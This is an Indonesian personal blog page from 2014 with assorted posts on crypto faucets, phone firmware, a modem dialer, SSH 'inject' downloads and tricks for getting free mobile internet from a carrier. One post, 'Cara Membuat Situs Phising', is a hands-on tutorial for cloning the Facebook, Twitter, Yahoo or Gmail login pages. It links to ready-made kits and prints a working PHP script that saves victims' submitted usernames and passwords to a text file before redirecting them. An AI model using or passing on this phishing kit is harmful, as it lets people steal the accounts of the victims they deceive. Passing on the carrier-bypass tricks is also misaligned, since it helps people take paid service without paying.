Powered by Blogger.

Monday, September 29, 2014

Cara mining Doge Coin convert ke BTC dan tukar IDR ( Rupiah )





Cara mining Doge Coin convert ke BTC dan tukar IDR ( Rupiah )


1. Buat akun dan Download Software  ( Disini )

2. Buat akun  untuk menukar ke btc ( Disini )

3. Buat akun untuk menukar ke IDR/Rupiah ( Disini )

dan beberapa tips mengumpulkan bitcoin gratis dengan Faucet

1. freebitco.in

2. 777bitco.in

3.moonbit.co.in

Monday, August 25, 2014

help Stock Firmware Advan T1L ( Vandroid )

Help Me.,,.,.,. Brother,..,.,,.

Ada yg punya Firmware Vandroid Advan T1L ,. ,. ,.
Bisa Bantu kah/atau share Ilmunya.,.,. Punya ane Bootlop





Mohon Bantuannya, Matur Thank Qyu,.,.,.
Maaf Ngerepotin Agan Agan.,,.,., Udah Mau mampir ., .,

Sunday, August 24, 2014

cara mengumpulkan bitcoin dengan cepat dan mudah

SSH + INJECT WORK 100% UPDATE 24 AUGUST 2014 FAST SPEED

Thursday, July 10, 2014

DSSHL public version

hanya mau berbagi yg mau aja ya


harap tingal jejak anda di komentar di bawah ya gan..





NB: Untuk anda penjual SSH jgn main branding aja tanpa minta ijin... hargai lah pembuat nya
sy cukup tau aja siapa anda karna sy dapat tlp dan sms serta invite pin bb menyakan SSH yg anda jual
kalau mau sy jual kok SC (source code) murah kok cuma 50k saja anda bisa rubah dengan nama/group ssh anda.

DOWNLOAD

Tuesday, July 8, 2014

inject ssh SINGA PREMIUM 8 JULY

Thursday, July 3, 2014

mmd x mini mobile data versi limited edition

mmd x mini mobile data versi limited edition

mmdxn 300x204 mmd x mini mobile data versi limited edition mdma soebis download mmd x download mmd versi terbaru download mini mobile data download mdma modem zte download mdma modem sierra download mdma modem huawei cara setting mini mobile data cara menggunakan mmd
yang suka dengan mmd nya pak soebis atau pengguna baru  sekarang saya akan share kembali mmd x mini mobile data versi limited edition, ini software versi update terakhir nya karna sesuai dengan kata – kata dia dalam file read me nya yang berbunyi seperti ini.
Pertama-tama saya ucapkan terimakasih banyak yang sebesar2nya kepada pengguna setia MMD selama ini.,
Program MMD X kali ini mungkin merupakan update terakhir dari saya. karena semakin bnyk urusan pribadi di real, membuat saya tidak bs lagi untuk menyentuh project MMD ini.
Saya mohon maaf yg sebesar2 nya..
Tapi insya allah jika kalau saya mempunyai waktu luang. saya akan coba update kembali. soal na sibuk ngurusin keluarga sekarang hehehe…
Program berikut ini adalah Versi MMD X. sebenarnya seh sama aja dengan versi yg seblum nya (v1.4 Beta) tapi kali ne banyak perubahan yg telah saya lakukan. terutama GUI, tampilan GUI nya telah saya modif sedemikian rupa. supaya lebih friendly atau dalam kata lain tidak pasaran (hahahah), mudah2an suka dengan tampilan GUI kali ini. dan ada beberapa perbaikkan bugs yg ada d program sebelumnya..

Fungsi-fungsi Program :

- Dialler
- Diagnostics
- USSD
- SMS
- Routing
- Auto Route
- Auto Reconnect
- IP Hunter
- dll

nah jika anda masih ada yang belum ngerti cara menggunakan fitur -fitur nya maka sebaik nya anda cek dulu artikel sebelum nya dari versi awal hingga akhir.
  1.  mini mobile data v 1.2 aplikasi dialer untuk modem sierra dan huawei
  2. mini mobile data v 1.3 updated untuk modem huawei sierra dan zte
  3. download mini mobile data v1.4 beta
jika anda sudah membaca tutorial dari saya, maka saya akan sedikit mengasih tambahan, mmd bukan hanya bisa berfungsi pada modem sierra, huawei dan zte akan tetapi mmd juga bisa berfungsi juga pada modem prolink, namun ada catetan khusus buat modem tersebut dari pak subis nya..hihi

Tips :

  •  Bagi yg mw menggunakan Auto Route selain proxy masing2 Opsel. silahkan aja isi proxy nya secara normal d kolom proxy auto route.
  • Mohon Tunggu sekitar 5-10 Detik jika Qos tidak keluar.
  • Tekan tombol Refresh jika sebagian Info Diagnostics tidak keluar.
  • Untuk menggeser Posisi Program, klik d bagian Sinyal bar.
  • Dan untuk Minimize, Minimize To Tray and Close. klik Kanan d bagian Sinyal Bar
  • Kalau MMD tidak dapat Open/diteksi ComPort Modem nya (kalau tidak support). isi d bagian kolom device Name seperti ini :

Unknown (COM36)

Huruf “U” harus huruf besar. “COM36″ itu merupakan seriar Port modem anda. jadi liat dulu d device manager bagian Port,
untuk mengetahui Serial Port modem anda.
Lalu tekan tombol Set
nah di atas adalah catetan khusus dari sang pembuat jadi harus ada pemilihan comport manual jika aplikasi mengalami error pada modem merk prolink.

lanjut ke  tambahan fitur

  • cek suhu modem buat merk sierra

  • cek speed maksimal internet

  • nomor2 khusus operator pada menu USSD

  • bisa ganti tampilan lewat tombol change skin

cek suhu modem buat merk sierra

temp mmd x mini mobile data versi limited edition mdma soebis download mmd x download mmd versi terbaru download mini mobile data download mdma modem zte download mdma modem sierra download mdma modem huawei cara setting mini mobile data cara menggunakan mmd gambar yang di kiri itu menandakan temperature modem anda atau keadaan suhu modem anda, jika signal kecil biasanya suhunya panas banget.

cek speed maksimal internet

spid mmd x mini mobile data versi limited edition mdma soebis download mmd x download mmd versi terbaru download mini mobile data download mdma modem zte download mdma modem sierra download mdma modem huawei cara setting mini mobile data cara menggunakan mmd
gambar yang saya lingkari biru di samping adalah gambar speed maksimal upload download internet anda, jadi anda gak harus repot – repot lagi pake idm atau web speed test buat tes kecepatan koneksi internet anda icon biggrin mmd x mini mobile data versi limited edition mdma soebis download mmd x download mmd versi terbaru download mini mobile data download mdma modem zte download mdma modem sierra download mdma modem huawei cara setting mini mobile data cara menggunakan mmd

nomor2 khusus operator pada menu USSD

us 300x195 mmd x mini mobile data versi limited edition mdma soebis download mmd x download mmd versi terbaru download mini mobile data download mdma modem zte download mdma modem sierra download mdma modem huawei cara setting mini mobile data cara menggunakan mmd
pada bagian menu USSD seperti gambar di samping pak kubis dah nambahin operator khusus nih biar kita gak cape ngetik kalo mau cek pulsa dll, dan ente gak harus nginget -nginget nomor nya, kadang kan suka lupa tuh kaya cek sc (sim card) yang aneh – aneh, nomor – nomor dial buat operator gsm sih dah komplit jadi tinggal pilih dan klik send aja bro icon biggrin mmd x mini mobile data versi limited edition mdma soebis download mmd x download mmd versi terbaru download mini mobile data download mdma modem zte download mdma modem sierra download mdma modem huawei cara setting mini mobile data cara menggunakan mmd

bisa ganti tampilan lewat tombol change skin

change skin 300x200 mmd x mini mobile data versi limited edition mdma soebis download mmd x download mmd versi terbaru download mini mobile data download mdma modem zte download mdma modem sierra download mdma modem huawei cara setting mini mobile data cara menggunakan mmd ganti tampilan dengan warna dan skin yang berbeda – beda sesuai dengan selera anda, dan anda bisa mengubah nya pada menu about pada tombol change skin.
NB :
Mohon bagi pengguna Win 7 and 8, gunakan Run With Admin saat menjalankan MMD X.
karena d program kali ini tidak saya sertakkan Auto Run With Admin.
sekian artikel saya tetang mmd x mini mobile data versi limited edition, mudah – mudahan membantu anda buat penggunaannya. jika ada kesulitan atau kritik dan saran untuk aplikasi ini anda tinggal kirim email ke pembuat nya seperti catatan di bawah ini.
Mohon Kasih info report error/bugs yg terjadi ke Email : Soeb_Uzumaki@yahoo.co.id
dengan Format Judul Email : MMD X
tapi jika anda ingin menanyakan soal penggunaan nya atau ada sesuatu yang anda tidak mengerti anda bisa berkomentar di blog ini.
kalimat penutup dari soeb
Saya tidak bosan2nya mengucapkan terima kasih bagi pengguna setia MMD Selama ini,
tanpa dukungan kalian mngkin program MMD tidak mungkin bs sampai sekarang ini.
Thank’s for you Support icon smile mmd x mini mobile data versi limited edition mdma soebis download mmd x download mmd versi terbaru download mini mobile data download mdma modem zte download mdma modem sierra download mdma modem huawei cara setting mini mobile data cara menggunakan mmd
By : Soeb Uzumaki
langsung saja anda download aplikasi nya di link di bawah ini.
link direct download >>> MMD X <<<

update mmd x return versi terbaru mmd

ada beberapa update yang di sajikan yaitu :
  • AT COmmand
  • Traffich Graph (Max Speed Down/Up, Average Down/Up, Speed Down/Up)
  • dan unlock modem

menghadirkan kembali fitur AT COmmand

fitur AT COmmand dihadirkan kembali pada aplikasi modem ini dan jika anda mengerti anda pasti bisa langsung menggunakanya jika tidak sebaiknya anda search dulu di google icon biggrin mmd x mini mobile data versi limited edition mdma soebis download mmd x download mmd versi terbaru download mini mobile data download mdma modem zte download mdma modem sierra download mdma modem huawei cara setting mini mobile data cara menggunakan mmd

Traffich Graph (Max Speed Down/Up, Average Down/Up, Speed Down/Up)

anda juga dihadirkan dengan grafik download untuk melihat rata2 kestabilan speed intenernet anda ketika download misalnya. anda cukup mengaktifkan fitur ini pada menu dialler dengan cara ceklis show graph dan unceklis untuk mematikan fitur ini contoh lihat gambar
graf 300x200 mmd x mini mobile data versi limited edition mdma soebis download mmd x download mmd versi terbaru download mini mobile data download mdma modem zte download mdma modem sierra download mdma modem huawei cara setting mini mobile data cara menggunakan mmd
c
atatan : Bagi yg mw merubah warna Traffich Graph nya, klik Huruf “D” and “U”

unlock modem huawei

sekarang pak sosis ngupdate mmd dengan unlock modem huawei, yang telah pasti berhasil adalah modem huawei E173, anda bisa praktekan sendiri jika modem huawei anda belum di unlock.
Bagi yg mw Unlock modem, klik arah tanda panah d sudut kanan bawah untuk membuka tab Unlock modem, klik icon gembok.
cara Unlock :
  1. Klik tombol Get IMEI
  2. Klik tombol Get Code
  3. Klik tombol Unlock, tunggu proses sampai selesai. klo sudah berhasil Unlock. kembali k Tab Diagnostics, klik tombol Detect Device or Refresh
  4. klo mw lebih jelas nya liat gambar d sini :
unlock mmd x mini mobile data versi limited edition mdma soebis download mmd x download mmd versi terbaru download mini mobile data download mdma modem zte download mdma modem sierra download mdma modem huawei cara setting mini mobile data cara menggunakan mmd
nah jelas banget kan  cara unlock nya.
sekian update mmd x return versi terbaru dari saya semoga bermanfaat
now i will give you download
ehh di like atau di share dulu y biar link nya muncul icon biggrin mmd x mini mobile data versi limited edition mdma soebis download mmd x download mmd versi terbaru download mini mobile data download mdma modem zte download mdma modem sierra download mdma modem huawei cara setting mini mobile data cara menggunakan mmd

Sunday, June 29, 2014

Cara Membuat Situs Phising

Cara Membuat Situs Phising  - 

Teknik ini sendiri telah banyak digunakn/diterapkan untuk mencuri username dan password yang sangat efektif selain dengan menggunakan keylogger, teknik ini biasa digunakan untuk mencuri akun email (Seperti Yahoo,Gmail,Hotmail, Dll) dan bebarapa situs jejaring sosial seperti (Facebook,Twitter,Friendster) bahkan situs-situs transaksi online seperti (Paypal, E-Bay) dan lain-lain.

Pada postingan saya kali ini saya akan membahas teknik untuk mencuri password (ingat hanya sebagai wawasan) di berbagai website dan ada beberapa tutorial yaitu untuk :




  • Facebook
  • Twitter
  • Gemscool
  • Yahoo & gMail
  • Mohon maaf untuk sementara ini hanya beberapa saja
jadi situs phising ini juga dapat diartikan sebagai fake login atau halaman palsu yang akan menyimpan data dan password korban, dan sekali lagi saya ingatkan ini hanyalah untuk pengetahuan semata, terimakasih dan ingat gunakanlah dengan bijak, agar indonesia maju,,hhh,oke lah saya kira cukup basa-basinya saya kira anda sudah cukup mengerti tentang situs phising, dan selain itu pada artikel kali ini saya juga menyertakan cara untuk menghibdari phising dengan aman, ingat segalanya pasti ada kelemahanya/kekurangnaya jadi untuk mencuri password ini juga da caranya selagi anda berhati-hati dan tidak membuka neko-neko(macam-maca) di internet, hhhh ngomong apaan sih?, maklum admin kan uwong jowo atau orang jawa asli, jadi ngomongnya juga bahasa jawa karena bahasa sehari-hari juga bhasa jawa, tapi admin juga tidak hanya menguasai bahasa jawa, saya juga menjunjung tinggi bahasa persatuan (bhasa indonesa) Nglantur mode On, maaf terlalu banyak kata yang saya ucap karena ini adalah salah satu cara ampuh agar post ini bisa bertahan dan jadi no.1 di mbah google.

Langsung saja untuk cara membuat fake login atau situs phising, hampir semua orang hacker, tau cara ini jadi untuk menjadi newbie hacker ikuti langkah berikut ini, eitzzz, tunggu dulu masih ada syaratnya sebelum anda membuat situs fake login atau phising anda harus mempunyai :
  • Hosting & domain
  • Nyali untuk berbohong hhh
  • Script (tenag sudah saya sediakan)
Ada 2 cara untuk membuatnya pertama, dengan cara mudah dan cepat jadi disni script sudah saya sediakan sendiri dan anda tinggal menguploadnya di web hosting anda. Dan cara kedua yaitu anda membuatnya mulai dari awal, seperti mengedit2 nama file, membuat script dll, oke langsung saja silahkan dipilih, untuk cara mudah hanya ada 4 script yaitu (facebook,twitter,gemscoo,yahoo&gmail) yang lainnya bisa anda buat sendiri di cara manual.

Cara cepat atau mudah :


  1. Pertama-tama anda harus mempunyai sebuah webhosting apabila belum silahkan daftar pada sebuah hosting silahkan untuk daftar salah satu webhosting. Silahkan Daftar disini .
  2. Setelah mempunyai sebuah webhosting, nyali anda akan diuji disini, bagi anda yg sudah pernah ikut dunia lain/pernah lihat dunia lain jadi anda pasti adalah orang yang pemeberani, oke selanjutnya download script-script untuk persiapan hack password nanti ada beberapa pilihan untuk download file sesuai kebutuhan anda (dalam hal ini kita akan coba pakai script FB).
    Download

  3. Setelah download jangan lupa ekstrak file hasil download tadi, lalu masuk ke file manager anda dan upload script tersebut kedalam web hosting yang sudah anda buat tadi, cara upload masuk ke Another File manager > Public_html > Upload , upload semua file yang sudah anda download tadi.
  4. Tampilan setelah di upload (untuk FB pakai yang Index.php, hello.php, logs.php) untuk file dengan ekstensi LOL.txt nanti otomatis akan terbuat sendiri.
  5. Sekarang website phising anda sudah jadi dan anda dapat menggunakan nyali anda untuk membohongi teman anda tentang web trsbut, jadi ketika teman anda mengetikan email dan password mereka akan langsung terekam/tercatat pada lol.txt,
  6. Untuk versi Mobile sama cuma ada di folder "M".
  7. Selamat mencoba dan semoga berhasil

Cara Membuat Script Web Phising

Phising, yang berasal dari kata fishing yang diartikan dalam bahasa indonesia artinya memancing. Benar ! teknik metodhe ini tidak asing lagi bagi para hacker yang ingin mengetahui identitas korbannya. Akan tetapi phising ini juga bisa disediakan dalam bentuk website yang sebagai manipulasi ( fake ) . Bagaimana cara membuat page scriptnya ? Langsung saja kalian simak cara membuat page phising berbasis web sebagai berikut :

1. Pertama kunjungi dan lihat source code situs yang ingin dibuat jebakan phising (Ex : facebook, paypal, yahoo, etc ) lalu lihat source codenya (Ctrl + U ) atau klik kanan mouse lalu pilih view source itu pun kalau mozilla & Chrome, Entah apa kalau memakai browser yang lain :) . Lihat Gambar dibawah untuk lebih jelasnya :


2. Lalu copy dan pastekan di notepad, kemudian Save file tersebut dengan nama " index.htm atau index.html " .

3. Selanjutnya kita mengedit bagian source dengan langkah - langkah :
  • Cari code " action= " (Ctrl + F untuk mencari ) lalu hapus alamat asli facebook dan ganti dengan " /login.php " ( Untuk direct ) . 
  • Dan ganti metodhenya dari " post " menjadi "get " .Lihat Gambar dibawah ini !
 4. Sesudah itu, buat page headernya (" login.php ") untuk direct akses page web. Buka notepad kalian lalu isikan dengan code dibawah ini lalu save dengan nama " login.php " :


 <?php
header("Location: http://www.google.com");
$handle = fopen("passes.txt", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Seperti gambar dibawah ini :

Keterangan :
  • http://www.google.com alamat yang akan muncul ketika sesi login selanjutnya. Bisa diedit misalnya : http://facebook.com, yahoo.com, dll
  • passes.txt , untuk melihat password dengan melalui url . Ex : http://domainkalian.com/passes.txt
5 . Selanjutnya kalian bisa ujicoba web phising tersebut dengan menguploadkannya di hosting kalian!

Semoga bermanfaat bagi kalian. Ingat ! ini hanya untuk pembelajaran bukan untuk kejahatan, kalau misalkan mau akun facebook ,rentaslah milik orang luar negeri (kecuali bangsa muslim) dari pada dalam negeri karena itu menghancurkan bangsa sendiri dan agama melalui hacking. Wasalamu'alaikum Wr. Wb .

Friday, June 27, 2014

firmware samsung C3262 Champ Neo Duos

C3262 Champ Neo Duos

barang kalia ada yg membutuh kan silahkan 
semoga membantu...






DOWNLOAD C3262DXLI5_OLALI5.rar

Wednesday, June 25, 2014

Cara Daftar VPS singapure

bagia anda yg mau belajar install vps singapure


Our referral program rewards you by referring friends and colleagues to DigitalOcean. We will issue you $25 in commission for every referred customer that totals $25 in billings. Please use the unique referral code link below when referring someone to DigitalOcean. This will allow us to track the customers that you refer as well as your commission.

Please note: Bidding on branded keywords which include 'digitalocean' and/or 'digital ocean' for ads is prohibited.

di sini

Tuesday, June 17, 2014

NEW update inject plus louncher

hanya mau berbagi yg mau aja ya


harap tingal jejak anda di komentar di bawah ya gan..





NB: Untuk anda penjual SSH jgn main branding aja tanpa minta ijin... hargai lah pembuat nya
sy cukup tau aja siapa anda karna sy dapat tlp dan sms serta invite pin bb menyakan SSH yg anda jual
kalau mau sy jual kok SC (source code) murah kok cuma 50k saja anda bisa rubah dengan nama/group ssh anda.

DOWNLOAD

Friday, June 13, 2014

TRIK INTERNET GRATIS 3 AON

TRIK INTERNET GRATIS 3 AON EDISI BULAN JUNI TERBARU MANTAP
TRIK INTERNET GRATIS TRI AON KUOTA KECEPATAN 150KBPS
< https://www.tusfiles.net/7kwm6kukvrer >

TRIK INTERNET THREE AON PROXI BARU MANTAP
[ https://www.tusfiles.net/9ha630cfkbvx ]
TRIK INTERNET GRATIS 3 AON KUOTA 0MB 100% WORK!
( https://www.tusfiles.net/2dmtn709voyy >
TRIK INTERNET GRATIS 3 AON SUPPORT SEMUA HP
[ https://www.tusfiles.net/6c5pcgvr3q5x ]
TRIK INTERNET GRATIS 3 AON KUOTA 0MB 100% WORK!
( https://www.tusfiles.net/2dmtn709voyy >

Free SSH japan speed mantap

silakan yg mw ssh dengan domain


 DOWNLOAD

Wednesday, June 11, 2014

inject plus louncher

hanya mau berbagi yg mau aja ya


NB: Untuk anda penjual SSH jgn main branding aja tanpa minta ijin... hargai lah pembuat nya
sy cukup tau aja siapa anda karna sy dapat tlp dan sms serta invite pin bb menyakan SSH yg anda jual
kalau mau sy jual kok SC (source code) murah kok cuma 50k saja anda bisa rubah dengan nama/group ssh anda.
Download

Tuesday, June 3, 2014

UPDATE SSH GRATIS PREMIUM 3 JUNI 2014

Sore Gan..
UPDATE SSH GRATIS PREMIUM 3 JUNI 2014
SERVER AUSTRALIA
https://www.tusfiles.net/l6mrizlqcxii
https://www.tusfiles.net/m6912okr2hcs
https://www.tusfiles.net/vptueyawf4fe
https://www.tusfiles.net/f5swhx13301v
https://www.tusfiles.net/rvt6znbkb6pz

SERVER AMERIKA
https://www.tusfiles.net/8ykattch6v40
https://www.tusfiles.net/cha246401wl7
https://www.tusfiles.net/hjrov1ms557l
https://www.tusfiles.net/8wzpwosb6650
https://www.tusfiles.net/tvujr92n8xqu
SERVER KANADA
https://www.tusfiles.net/k61y00q6zr4c
https://www.tusfiles.net/lmhz53ppb0tr
https://www.tusfiles.net/lf75j4d0w5bo
https://www.tusfiles.net/81sbdxb4faei
https://www.tusfiles.net/v8rkhm1z5sz8
SERVER INDONESIA
https://www.tusfiles.net/c6kf3p4om5i3
https://www.tusfiles.net/gb4vavy8qwos
https://www.tusfiles.net/ih6pkp4vc9c9
https://www.tusfiles.net/3jfvuv28kpgc
https://www.tusfiles.net/e8y0wbv1qbzr
SERVER JAPAN
https://www.tusfiles.net/ovn8dc73yt29
https://www.tusfiles.net/12ay5y3lv6vg
https://www.tusfiles.net/z2fm7tfxblj9
https://www.tusfiles.net/4ubcsjt9er1o
https://www.tusfiles.net/yadt2zkgmmpm
SERVER SG.GS
https://www.tusfiles.net/8jksnsznajwb
https://www.tusfiles.net/hm51t73imooa
https://www.tusfiles.net/zkr0bsl3lmml
https://www.tusfiles.net/stogkpwaaqo5
https://www.tusfiles.net/uq9io7hagn1o
SERVER SG.GS PREMIUM
https://www.tusfiles.net/kbepto6x3szj
https://www.tusfiles.net/ig3qqbtc4ink
https://www.tusfiles.net/t2madch3aje8
https://www.tusfiles.net/llhc6y1iwoa2
https://www.tusfiles.net/kyorzkxhxtfk
SERVER USA
https://www.tusfiles.net/4n35mjkp359v
https://www.tusfiles.net/p2gqrw893bjm
https://www.tusfiles.net/gbkj1o7ygjax
https://www.tusfiles.net/nqmmok6alo9e
https://www.tusfiles.net/09c6krugt2pj
SERVER USA.GS
https://www.tusfiles.net/3ys01427yr8n
https://www.tusfiles.net/i5jzypusjfye
https://www.tusfiles.net/ufswtp768wr4
https://www.tusfiles.net/8wwaafpszrf7
https://www.tusfiles.net/rr5haeq5quq2

 

Site Info